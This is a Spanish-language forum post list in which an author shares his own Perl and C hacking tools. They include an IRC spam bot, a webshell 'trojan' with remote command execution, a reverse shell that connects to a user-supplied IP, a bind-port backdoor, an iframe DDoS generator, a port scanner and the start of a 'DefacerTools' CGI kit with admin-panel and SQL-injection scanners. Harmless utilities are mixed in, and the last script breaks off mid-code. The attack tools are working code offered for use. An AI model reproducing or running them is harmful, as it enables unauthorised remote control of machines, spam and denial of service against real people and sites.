Mostrar Mensajes

#421

Scripting / [Perl] IRC Spam 0.3

19 Enero 2012, 20:34 PM

Un simple script para hacer spam molesto a cada uno de los usuarios que esten en en canal , el spam lo
pueden editar con una pagina cualquiera o lo que quieran promocionar.

Código (perl) [Seleccionar]


#!usr/bin/perl
#IRC Spam 0.3
#Coded By Doddy H

use IO::Socket;

my @msg_users = ( "Hola",         "Chau" );          #Spam to users
my @msg_canal = ( "Hola a todos", "que ondaaa" );    #Spam to canal
my @bots      = ( "Jebus",        "Ramona" );        #Names of the bots

&head;

unless ( @ARGV == 2 ) {

    &sintax;

}
else {

    print "\n[+] Connecting\n\n";

    if (
        my $socket = new IO::Socket::INET(
            PeerAddr => $ARGV[0],
            PeerPort => 6667,
            Proto    => "tcp"
        )
      )
    {

        my $nombre = $bots[ rand(@bots) ];

        chomp $nombre;

        print $socket "NICK $nombre\r\n";
        print $socket "USER $nombre 1 1 1 1\r\n";
        print $socket "JOIN $ARGV[1]\r\n";

        print "[+] Spammer Online\n\n";

        while ( my $log = <$socket> ) {

            chomp $log;

            if ( $log =~ /^PING(.*)$/i ) {
                print $socket "PONG $1\r\n";
            }

            if ( $log =~ m/:(.*) 353 (.*) = (.*) :(.*)/ig ) {

                while (true) {

                    my $pro = $4;

                    sleep 10;

                    print $socket "PRIVMSG $ARGV[1] "
                      . $msg_canal[ rand(@msg_canal) ] . "\r\n";
                    my @nicks = split " ", $pro;

                    sleep 3;

                    foreach $names (@nicks) {
                        unless ( $nombre eq $names ) {
                            $names =~ s/\@//;
                            print $socket
                              "MSG $names $msg_users[rand(@msg_users)]\r\n";
                            print "[+] Spam : $names !\n";
                        }
                    }
                }
            }
        }
    }
    else {
        print "[-] Error\n";
    }
}

&copyright;

sub sintax {
    print "\n[+] : $0 <server> <channel>\n";
}

sub head {

    print qq(

 @  @@@@@    @@@@      @@@   @@@@@    @    @     @  @     @  @@@@@  @@@@@ 
 @  @    @  @    @    @   @  @    @   @    @     @  @     @  @      @    @
 @  @    @  @         @      @    @  @ @   @@   @@  @@   @@  @      @    @
 @  @    @  @         @      @    @  @ @   @@   @@  @@   @@  @      @    @
 @  @@@@@   @          @@@   @@@@@  @   @  @ @ @ @  @ @ @ @  @@@@   @@@@@ 
 @  @    @  @             @  @      @   @  @ @ @ @  @ @ @ @  @      @    @
 @  @    @  @             @  @      @@@@@  @  @  @  @  @  @  @      @    @
 @  @    @  @    @    @   @  @     @     @ @  @  @  @  @  @  @      @    @
 @  @    @   @@@@      @@@   @     @     @ @     @  @     @  @@@@@  @    @


);

}

sub copyright {
    print "\n\n(C) Doddy Hackman 2012\n\n";
}

# The End ?

#422

Scripting / [Perl] Commander 0.3

19 Enero 2012, 20:34 PM

Una mejora de un troyano al estilo webshell que habia hecho el verano pasado.

Código (perl) [Seleccionar]


#!usr/bin/perl
#
#C0mmand3r (C) Doddy HAckman 2012
#Version 0.3
#
#A simple WebShell in Perl
#
#

use IO::Socket;
use CGI;
use Cwd;
use Win32;

my $port = rep();

sub rep {
    unless ( $ARGV[0] ) {
        return int("777");    #Your Can Edit 666
    }
    else {
        return int( $ARGV[0] );
    }
}

print "\n\n#########################################\n\n";
print "C0mmand3r (C) Doddy HAckman 2012\n\n\n";
print "[+] Starting the webshell on port $port\n\n";
print "#########################################\n\n";

my $sock = new IO::Socket::INET(
    LocalHost => 'localhost',
    LocalPort => $port,
    Proto     => 'tcp',
    Listen    => SOMAXCONN,
    Reuse     => 1
);

while ( $jebus = $sock->accept() ) {

    print $jebus "HTTP/1.1 200/OK\r\nContent-type:text/html\r\n\r\n";

#print $jebus "HTTP/1.1 200/OK\r\nContent-type:application/w-www-form-urlencoded\r\n\r\n";
    next if $slave = fork;

    close $sock;

    while ( $response = <$jebus> ) {

        chomp($response);

        my %rta;

        if ( $response =~ /GET/ig ) {
            capturar($response);
        }

        sub capturar {
            my $aa = shift;
            chomp $aa;
            if ( $aa =~ /GET \/(.*) HTTP\/1.1/ig ) {
                my $todo = $1;
                if ( $todo =~ /\?(.*)=(.*)&(.*)=(.*)/ig ) {
                    $rta{$1} = $2;
                    $rta{$3} = $4;
                }
                if ( $todo =~ /\?(.*)=(.*)/ig ) {
                    $rta{$1} = $2;
                }
            }

        }

        print $jebus "

<style type=text/css>


.main {
margin			: -287px 0px 0px -490px;
border			: White solid 1px;
BORDER-COLOR: #00FF00;
}

#pie {
position: absolute;
bottom: 0;
}

body,a:link {
font: normal 16px Verdana, Arial, Helvetica,
sans-serif;
background-color: #000000;
color:#00FF00;
Courier New;
cursor:crosshair;
font-size: small;
}

input,table.outset,table.bord,table,textarea,select,fieldset {
background-color:black;color:#00FF00; 
border: solid 1px #00FF00;
border-color:#00FF00
}

a:link,a:visited,a:active {
color: #00FF00;
font: normal 16px Verdana, Arial, Helvetica,
sans-serif;
text-decoration: none;
}

</style>

";

        if ( $rta{'info'} ) {

            info();

            print $jebus "<center><br><br><b>IP : </b>" . get_ip() . "<br>";
            print $jebus "<center><br><br><b>Domain : </b>"
              . Win32::DomainName() . "<br>";
            print $jebus "<b>Chip : </b>" . Win32::GetChipName() . "<br>";
            print $jebus "<b>OS : </b>" . Win32::GetOSName() . "<br>";
            print $jebus "<b>Version : </b>" . Win32::GetOSVersion() . "<br>";
            print $jebus "<b>User : </b>"
              . Win32::LoginName()
              . "<br><br></center>";
            copyright();

        }

        elsif ( $rta{'console'} ) {
            logouno();
            print $jebus "
<br><br><center>
<form action='' method=GET>
Command : <input type=text name=cmd value=ver><input type=submit value=Execute>
</center></form><br><br>
";
            copyright();
        }

        elsif ( $rta{'cmd'} ) {
            logouno();
            $lucha = $rta{'cmd'};
            print $jebus "<br><br><center><fieldset>";
            $lucha =~ s/\+/ /;
            print $jebus "<br>[+] Command : <b>$lucha</b><br><br>";
            print $jebus qx($lucha);
            print $jebus "</center></fieldset>";
            copyright();
        }

        elsif ( $rta{'reverse'} ) {

            logodos();

            print $jebus qq(
<center>
<br><br><b>ReverseShell</b><br><br>
<form action='' method=GET>
<b>Your IP</B> : <input type=text name=ipconnect value=localhost><br>
<b>Port</b> : <input type=text name=port value=666><br>
<br><input type=submit value=Connect></form><br><br>
</center>
);

            copyright();
        }

        elsif ( $rta{'ipconnect'} ) {

            conectar( $rta{'ipconnect'}, $rta{'port'} );
            tipo();

            sub conectar {
                socket( REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp") );
                connect( REVERSE, sockaddr_in( $_[1], inet_aton( $_[0] ) ) );
                open( STDIN,  ">&REVERSE" );
                open( STDOUT, ">&REVERSE" );
                open( STDERR, ">&REVERSE" );
            }

            sub tipo {
                print "\n[*] Reverse Shell Starting...\n\n";
                if ( $^O =~ /Win32/ig ) {
                    infowin();
                    system("cmd.exe");
                }
                else {
                    infolinux();

                    #root();
                    system("export TERM=xterm;exec sh -i");
                }
            }

            sub infowin {
                print "[+] Domain Name : " . Win32::DomainName() . "\n";
                print "[+] OS Version : " . Win32::GetOSName() . "\n";
                print "[+] Username : " . Win32::LoginName() . "\n\n\n";
            }

            sub infolinux {
                print "[+] System information\n\n";
                system("uname -a");
                print "\n\n";
            }
        }

        elsif ( $rta{'backdoor'} ) {

            logotres();

            print $jebus qq(
<center>
<br><br><b>BindPort</b><br><br>
<form action='' method=GET>
<b>Port</b> : <input type=text name=portbind value=666><br>
<br><input type=submit value=Bind></form><br><br>
</center>
);

            copyright();

        }

        elsif ( $rta{'portbind'} ) {

            $backdoor = IO::Socket::INET->new(
                Proto     => 'tcp',
                LocalPort => $rta{'portbind'},
                Listen    => SOMAXC,
                Reuse     => 1
            );

            while ( $jesus = $backdoor->accept() ) {
                $jesus->autoflush(1);
                print $jesus
                  "[*] Heaven_Door Online\n[*] Port : 25256\n[*] PID : " 
                  . $$ . "\n\n";
                print $jesus "Welcome  " . $jesus->peerhost . "\n\n";
                &extras;
                $dir = getcwd();
                print $jesus $dir . ">>";
                while (<$jesus>) {
                    my $yeah = qx($_);
                    print $jesus "\n\n" . $yeah . "\n\n";
                    print $jesus $dir . ">>";
                }
            }

            sub extras {

                if ( $^O =~ //ig ) {
                    print $jesus "[+] Domain Name : "
                      . Win32::DomainName() . "\n";
                    print $jesus "[+] OS Version : "
                      . Win32::GetOSName() . "\n";
                    print $jesus "[+] Username : "
                      . Win32::LoginName()
                      . "\n\n\n";
                }
                else {
                    $s = qx("uname -a");
                    print $jesus "--==System Info==--\n\n" . $s;
                }
            }
        }

        elsif ( $rta{'about'} ) {

            about();

            print $jebus qq(
<pre><center>

                                           
                 ¾¾¾¾¾¾¾¾¾¾¾               
             ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾           
           ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾          
         ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾         
         ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾        
        ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾       
       ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾       
       ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾       
       ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
        ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
        ¾¾¾¾¾¾¾  ¾¾¾¾¾¾¾¾¾¾¾    ¾¾¾¾       
         ¾¾¾¾       ¾¾¾¾¾¾      ¾¾¾¾       
          ¾¾¾      ¾¾¾ ¾¾¾      ¾¾¾        
          ¾¾¾¾¾¾¾¾¾¾¾   ¾¾¾   ¾¾¾¾          
           ¾¾¾¾¾¾¾¾¾     ¾¾¾¾¾¾¾¾¾         
           ¾¾¾¾¾¾¾¾¾  ¾  ¾¾¾¾¾¾¾¾¾         
           ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾         
                ¾¾¾¾¾¾¾¾¾¾¾¾¾              
              ¾  ¾¾¾¾¾¾¾¾¾¾  ¾             
              ¾    ¾ ¾¾¾¾ ¾  ¾             
              ¾ ¾¾          ¾¾             
     ¾¾¾      ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾             
    ¾¾¾¾¾      ¾¾¾¾¾¾¾¾¾¾¾¾¾¾      ¾¾¾     
    ¾¾¾¾¾¾¾      ¾¾¾¾¾¾¾¾¾¾¾      ¾¾¾¾¾¾   
    ¾¾¾¾¾¾¾¾¾¾      ¾¾¾         ¾¾¾¾¾¾¾¾¾  
     ¾¾¾  ¾¾¾¾¾¾             ¾¾¾¾¾¾¾¾¾¾¾   
              ¾¾¾¾¾¾     ¾¾¾¾¾¾¾           
                 ¾¾¾¾¾¾¾¾¾¾¾¾              
                  ¾¾¾¾¾¾¾¾¾                
               ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾             
           ¾¾¾¾¾¾¾         ¾¾¾¾¾¾¾         
       ¾¾¾¾¾¾¾                ¾¾¾¾¾¾¾¾¾¾   
  ¾¾¾¾¾¾¾¾                       ¾¾¾¾¾¾¾¾  
  ¾¾¾¾¾¾                           ¾¾¾¾¾¾  
   ¾¾¾¾                             ¾¾¾¾   
                                          

</pre></center>

);

            copyright();

        }
        else {
            print $jebus "
<title>Commander 0.3 (C) Doddy Hackman 2012</title>
<br><br>
<h1><center>Commander</center></h1>
<br><br>
<center>
<table border=1>
<td class=main><center><b>Tools</b></center></td><tr>
<td class=main><a href=?info=true><center>Information</center></a></td><tr>
<td class=main><a href=?console=true><center>Console</center></a></td><tr>
<td class=main><a href=?backdoor=true><center>Backdoor</center></a></td><tr>
<td class=main><a href=?reverse=true><center>ReverseShell</center></a></td><tr>
<td class=main><a href=?about=true><center>About</center></a></td>
</table>
</center>
";
            copyright();
        }
        $jebus->close;
    }
}
continue {
    $jebus->close;
}

sub logouno {
    print $jebus qq(

<pre><center>


    @@@@@@@@                                                  @@            
  @@        @@                                                @@            
  @@                                                          @@            
  @@              @@@@@@    @@  @@@@      @@@@      @@@@@@    @@    @@@@@@  
  @@            @@      @@  @@@@    @@  @@    @@  @@      @@  @@  @@      @@
  @@            @@      @@  @@      @@    @@      @@      @@  @@  @@@@@@@@@@
  @@            @@      @@  @@      @@      @@    @@      @@  @@  @@        
  @@        @@  @@      @@  @@      @@  @@    @@  @@      @@  @@  @@      @@
    @@@@@@@@      @@@@@@    @@      @@    @@@@      @@@@@@    @@    @@@@@@  


</pre></center>
);
}

sub logodos {
    print $jebus qq(
<pre><center>


  @@@@@@@@@@                                                                    
  @@        @@                                                                  
  @@        @@                                                                  
  @@        @@      @@@@@@    @@      @@    @@@@@@    @@@@    @@@@      @@@@@@  
  @@@@@@@@@@      @@      @@  @@      @@  @@      @@  @@    @@    @@  @@      @@
  @@        @@    @@@@@@@@@@    @@  @@    @@@@@@@@@@  @@      @@      @@@@@@@@@@
  @@        @@    @@            @@  @@    @@          @@        @@    @@        
  @@        @@    @@      @@      @@      @@      @@  @@    @@    @@  @@      @@
  @@        @@      @@@@@@        @@        @@@@@@    @@      @@@@      @@@@@@  


</pre></center>
);
}

sub logotres {

    print $jebus qq(
<pre><center>

  @@@@@@@@                              @@                  @@                              
  @@      @@                            @@                  @@                              
  @@      @@                            @@                  @@                              
  @@      @@      @@@@@@      @@@@@@    @@    @@      @@@@@@@@    @@@@@@      @@@@@@    @@@@
  @@@@@@@@              @@  @@      @@  @@  @@      @@      @@  @@      @@  @@      @@  @@  
  @@      @@      @@@@@@@@  @@          @@@@        @@      @@  @@      @@  @@      @@  @@  
  @@      @@    @@      @@  @@          @@  @@      @@      @@  @@      @@  @@      @@  @@  
  @@      @@    @@      @@  @@      @@  @@    @@    @@      @@  @@      @@  @@      @@  @@  
  @@@@@@@@        @@@@@@@@    @@@@@@    @@      @@    @@@@@@@@    @@@@@@      @@@@@@    @@  


</pre></center>
);
}

sub about {

    print $jebus qq(
<pre><center>


      @@        @@                                      
      @@        @@                                  @@  
    @@  @@      @@                                  @@  
    @@  @@      @@@@@@@@      @@@@@@    @@      @@  @@@@
  @@      @@    @@      @@  @@      @@  @@      @@  @@  
  @@      @@    @@      @@  @@      @@  @@      @@  @@  
  @@@@@@@@@@    @@      @@  @@      @@  @@      @@  @@  
@@          @@  @@      @@  @@      @@  @@    @@@@  @@  
@@          @@  @@@@@@@@      @@@@@@      @@@@  @@    @@


</pre></center>
);

}

sub info {

    print $jebus qq(
<pre><center>


  @@    @@        @@    @@@@@@@@@@    @@@@@@@@  
  @@    @@@@      @@    @@          @@        @@
  @@    @@@@      @@    @@          @@        @@
  @@    @@  @@    @@    @@          @@        @@
  @@    @@  @@    @@    @@@@@@@@    @@        @@
  @@    @@    @@  @@    @@          @@        @@
  @@    @@      @@@@    @@          @@        @@
  @@    @@      @@@@    @@          @@        @@
  @@    @@        @@    @@            @@@@@@@@  


</pre></center>
);

}

sub get_ip {
    my $get = gethostbyname("");
    return inet_ntoa($get);
}

sub copyright {
    print $jebus
      "<br><br><br><br><center><h1>Coded By Doddy H</h2></center><br><br>";
    exit(1);
}

# The End ?

#423

Programación C/C++ / [C] ScanPort

8 Enero 2012, 18:42 PM

Un simple programa para scannear puertos, solo funciona bajo linux.

Código (c) [Seleccionar]

/**
* ScanPort 0.1
* Coded by Doddy H 
**/

#include<stdio.h>
#include<sys/socket.h>
#include<sys/types.h>
#include<stdlib.h>
#include<netdb.h>

void head() { 
  printf("\n-- == ScanPort 0.1 == --\n");
}

void end() {
  printf("\n\nWritten By Doddy H\n\n");
}

int main(int argc,char **argv) {
	
  char *ip;
  int port,control,partedos,portstart,portend;
  struct sockaddr_in parteuno;	

  head();
  if(argc != 4) {
    printf("\n[+] sintax : port <ip> <portstart> <portend>");
  } else {
    ip = argv[1];
    portstart = atoi(argv[2]);
    portend = atoi(argv[3]);
    printf("\n[+] Scanning %s\n",ip);
    printf("\n[+] Parameters : %d-%d\n",portstart,portend);
    for(port=portstart;port<portend;port++) {
      parteuno.sin_family=AF_INET;
      parteuno.sin_port=htons(port);
      parteuno.sin_addr.s_addr=inet_addr(ip);
      partedos=socket(AF_INET,SOCK_STREAM,0);
      control=connect(partedos,(struct sockaddr_in *)&parteuno,sizeof(parteuno));
      if(control>=0) {
        printf("\n[+] Port Found : %d",port);
      }   
    }
  }
  end();
  return 0;
}

/** The End ? **/

#424

Programación C/C++ / [C] ResolveIP

8 Enero 2012, 18:41 PM

Un simple programa para saber la IP de cualquier host.

Código (c) [Seleccionar]


/**
* ResolveIP 0.1 
* Written By Doddy H
* Thanks to CrashCool
*/

#include <winsock.h>
#include <stdio.h>

void head() {
  printf("\n -- == ResolveIP 0.1 == --\n\n");    
}

void end() {
  printf("\n\n -- == Written By Doddy H == --\n");
}

int main(int argc, char *argv[]) {
  char *dom,*host,*ip;
  struct hostent *parteuno;
  WSADATA partedos;

  head();
 
  if(argc != 2) {
    printf("\n[+] Sintax : resolve <host>\n");
  } else {
    dom = argv[1];
    WSAStartup(MAKEWORD(1,1),&partedos);
    parteuno = gethostbyname(dom);
    if(parteuno==NULL) {
      printf("\n[-] Error\n");
      end();
      exit(1);
    }
    host = parteuno->h_name;
    ip = inet_ntoa(*((struct in_addr *)parteuno->h_addr));
    printf("\n[+] HOST : %s",host);
    printf("\n[+] IP : %s\n",ip);
  }
  end();
  return 0;
}

/* The End */

#425

Programación C/C++ / [C] Manager

8 Enero 2012, 18:40 PM

Un simple programa para manejar los procesos de Windows.

Código (c) [Seleccionar]



/**
Simple process manager
Coded By Doddy H
**/

#include <windows.h>
#include <Tlhelp32.h>
#include <stdio.h>

int main() {
  HANDLE parteuno,partedos;
  PROCESSENTRY32 control;
  int re,pid;

  printf("\n\n-- == Manager == --\n\n");
  printf("1 - Show Process\n");
  printf("2 - Close Process\n");
  printf("3 - Exit\n\n");
  
  while(1) {
    printf("[Option] : ");
    scanf("%d",&re);
    
    if (re==1) {
      printf("\n[+] Getting process..\n\n");         
      parteuno = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
      Process32First(parteuno,&control);
      while(Process32Next(parteuno,&control)){
        printf("[+] Process : %s \n",control.szExeFile);
        printf("[+] PID : %i\n\n",control.th32ProcessID);
      }
      CloseHandle(parteuno);
    }
    else if (re==2) {
      printf("\n[PID] : ");
      scanf("%d",&pid);
      partedos =OpenProcess(PROCESS_TERMINATE,0,pid);
      if (TerminateProcess(partedos,0)) {
        printf("\n[+] Process Closed\n\n");
      } else {
        printf("\n[-] Error\n\n");
        exit(1);
      }
      CloseHandle(partedos);
    }
    else if (re==3) {
      setbuf (stdin,NULL);   
      printf("\n\nWritten By Doddy H\n\n");
      getchar();
      exit(1);
    }
  }
  return 0;
}

/** The End ? **/

#426

Programación C/C++ / [C] Iframe DDOS

8 Enero 2012, 18:38 PM

Un simple POC para iframe DDOS

Código (c) [Seleccionar]



/**
* Simple POC for IFRAME DDOS
* Coded By Doddy H
*/

#include <stdio.h>

void head() {
  printf("\n -- == IFRAME DDOS 0.1 == --\n\n");    
}

void end() {
  printf("\n\n -- == Coded By Doddy H == --\n");
}
 
int main ( int argc, char **argv ) {
  char *target;
  int i,count;
  FILE *archivo;

  head();
  if(argc != 3) {
    printf("\n[+] Sintax : ddos <target> <count>\n");
  } else {
    target = argv[1];
    count = atoi(argv[2]);
    printf("\n[+] Starting the party");
    archivo = fopen ("poc.html","a+"); 
    for(i=0;i<=count;i++) {                          
      fprintf(archivo,"%s","<iframe src='");
      fprintf(archivo,"%s",target);
      fprintf(archivo,"%s","' width='3' height='3'></iframe><br>\n");
    }
    fclose(archivo);    
    printf("\n[+] Finished\n");
  }     
  end();
  return 0;
}

/** The End ? */

#427

Programación C/C++ / [C] Hex Converter

8 Enero 2012, 18:37 PM

Un simple programa para convertir texto en hex

Código (c) [Seleccionar]

/**
* Hex Converter
* Coded By Doddy H
* Based in hex encoder by Ka0x
*/

#include <stdio.h>
#include <string.h>

void head() {
  printf("\n -- == Hex Converter == --\n\n");    
}

void end() {
  printf("\n\n\n -- == Coded By Doddy H == --\n");
}
 
int main ( int argc, char **argv ) {
  char *text;
  int i,total;
  
  head();
  if(argc != 2) {
    printf("\n[+] Sintax : hex <text>");
  } else {
    text = argv[1];
    total = strlen(text);
    printf("\n[Text] : %s\n",text);
    printf("[Encode] : 0x");
    for(i=0;i<total;i++){
      printf("%x",text[i]);
    }
  }     
  end();
  return 0;
}

/** The End ? */

#428

Scripting / [Perl] DefacerTools 0.5 (regalo de navidad)

11 Diciembre 2011, 01:03 AM

Hola aca les traigo un regalo de navidad que hice en 3 horas , es un programa en CGI para usar en webs que
soporten el mismo , yo hice todas las pruebas con xampp y al parecer todo funciona bien.

Las funciones del programa son :

HexConverter
PanelFinder
PathsFinder
SQLi Scanner
FuzzDNS
FinderPass
PortScanner

El codigo del programa (formateado con perltidy) es

defacertools.cgi

Código (perl) [Seleccionar] Expandir
#!"\xampp\perl\bin\perl.exe" # #DefacerTools 0.5 # #(C) Doddy Hackman 2012 # # use CGI; use LWP::UserAgent; use URI::Split qw(uri_split); use HTML::LinkExtor; use IO::Socket; @panels = ( 'admin/admin.asp', 'admin/login.asp', 'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx', 'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx', 'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp', 'asp/admin/admin.aspx', 'asp/admin/webmaster.asp', 'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx', 'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp', 'login/index.asp', 'login/index.aspx', 'login/login.asp', 'login/login.aspx', 'login/admin.asp', 'login/admin.aspx', 'administracion/index.asp', 'administracion/index.aspx', 'administracion/login.asp', 'administracion/login.aspx', 'administracion/webmaster.asp', 'administracion/webmaster.aspx', 'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/', 'admin/admin.php', 'admin/index.php', 'admin/login.php', 'admin/system.php', 'admin/ingresar.php', 'admin/administrador.php', 'admin/default.php', 'administracion/', 'administracion/index.php', 'administracion/login.php', 'administracion/ingresar.php', 'administracion/admin.php', 'administration/', 'administration/index.php', 'administration/login.php', 'administrator/index.php', 'administrator/login.php', 'administrator/system.php', 'system/', 'system/login.php', 'admin.php', 'login.php', 'administrador.php', 'administration.php', 'administrator.php', 'admin1.html', 'admin1.php', 'admin2.php', 'admin2.html', 'yonetim.php', 'yonetim.html', 'yonetici.php', 'yonetici.html', 'adm/', 'admin/account.php', 'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/home.php', 'admin/controlpanel.html', 'admin/controlpanel.php', 'admin.html', 'admin/cp.php', 'admin/cp.html', 'cp.php', 'cp.html', 'administrator/', 'administrator/index.html', 'administrator/login.html', 'administrator/account.html', 'administrator/account.php', 'administrator.html', 'login.html', 'modelsearch/login.php', 'moderator.php', 'moderator.html', 'moderator/login.php', 'moderator/login.html', 'moderator/admin.php', 'moderator/admin.html', 'moderator/', 'account.php', 'account.html', 'controlpanel/', 'controlpanel.php', 'controlpanel.html', 'admincontrol.php', 'admincontrol.html', 'adminpanel.php', 'adminpanel.html', 'admin1.asp', 'admin2.asp', 'yonetim.asp', 'yonetici.asp', 'admin/account.asp', 'admin/home.asp', 'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp', 'administrator/index.asp', 'administrator/login.asp', 'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp', 'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp', 'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp', 'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html', 'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/', 'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php', 'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp', 'Server/', 'wp-admin/', 'administr8.php', 'administr8.html', 'administr8/', 'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp', 'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp', 'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/', 'useradmin/', 'sysadmins/', 'admin1/', 'system-administration/', 'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/', 'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/', 'sys-admin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/', 'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/', 'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/', 'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/', 'login-redirect/', 'sub-login/', 'wp-login/', 'login1/', 'dir-login/', 'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/', 'login-us/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/', 'phppgadmin/', 'pureadmin/', 'sql-admin/', 'radmind/', 'openvpnadmin/', 'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/', 'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/', 'vmailadmin/', 'Indy_admin/', 'ccp14admin/', 'irc-macadmin/', 'banneradmin/', 'sshadmin/', 'phpldapadmin/', 'macadmin/', 'administratoraccounts/', 'admin4_account/', 'admin4_colon/', 'radmind-1/', 'Super-Admin/', 'AdminTools/', 'cmsadmin/', 'SysAdmin2/', 'globes_admin/', 'cadmins/', 'phpSQLiteAdmin/', 'navSiteAdmin/', 'server_admin_small/', 'logo_sysadmin/', 'server/', 'database_administration/', 'power_user/', 'system_administration/', 'ss_vms_admin_sm/' ); my @dns = ('www'); #my @dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc'); my $nave = LWP::UserAgent->new; $nave->agent( "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12" ); $nave->timeout(5); my %rta; my $que = new CGI; my @ques = $que->param; for (@ques) { $rta{$_} = $que->param($_); } print "Content-type:text/html\n\n"; print " <style type=text/css> .main { margin : -287px 0px 0px -490px; border : White solid 1px; BORDER-COLOR: #00FF00; } #pie { position: absolute; bottom: 0; } body,a:link { font: normal 16px Verdana, Arial, Helvetica, sans-serif; background-color: #000000; color:#00FF00; Courier New; cursor:crosshair; font-size: small; } input,table.outset,table.bord,table,textarea,select { background-color:black;color:#00FF00; border: solid 1px #00FF00; border-color:#00FF00 } a:link,a:visited,a:active { color: #00FF00; font: normal 16px Verdana, Arial, Helvetica, sans-serif; text-decoration: none; } </style>"; if ( $rta{'hex'} ) { logouno(); print qq(<form method=post action=''><b>Text to encode : </b><input type=text name=textocode value=test><input type=submit name=codificar value=Encode></form>); copyright(); } elsif ( $rta{'textocode'} ) { logouno(); print "[+] Encode : <b>" . encode( $rta{'textocode'} ) . "</b><br><br>"; print "</center>"; copyright(); } elsif ( $rta{'panelfinder'} ) { logodos(); print qq(<form method=post action=''><b>Page : </b><input type=text name=buscarpanel value=http://localhost/><input type=submit value=Find></form>); copyright(); } elsif ( $rta{'buscarpanel'} ) { my $page = $rta{'buscarpanel'}; logodos(); print "<br>[+] Scanning $page<br><br>"; for $path (@panels) { $code = tomax( $page . "/" . $path ); if ( $code->is_success ) { print "[Link] : " . $page . "/" . $path . "<br>"; } } print "<br><br>[+] Finish<br>"; copyright(); } elsif ( $rta{'pathsfinder'} ) { logotres(); print qq(<form method=post action=''><b>Page : </b><input type=text name=buscarpaths value=http://localhost/doddy><input type=submit name=codificar value=Find></form>); copyright(); } elsif ( $rta{'buscarpaths'} ) { logotres(); my $page = $rta{'buscarpaths'}; my $code = toma($page); my @links = get_links($code); print "<br><br>[+] Finding paths<br><br>"; for my $com (@links) { my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page); if ( $path =~ /\/(.*)$/ ) { my $path1 = $1; $page =~ s/$path1//ig; my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com); if ( $path =~ /(.*)\// ) { my $parche = $1; unless ( $repetidos =~ /$parche/ ) { $repetidos .= " " . $parche; my $code 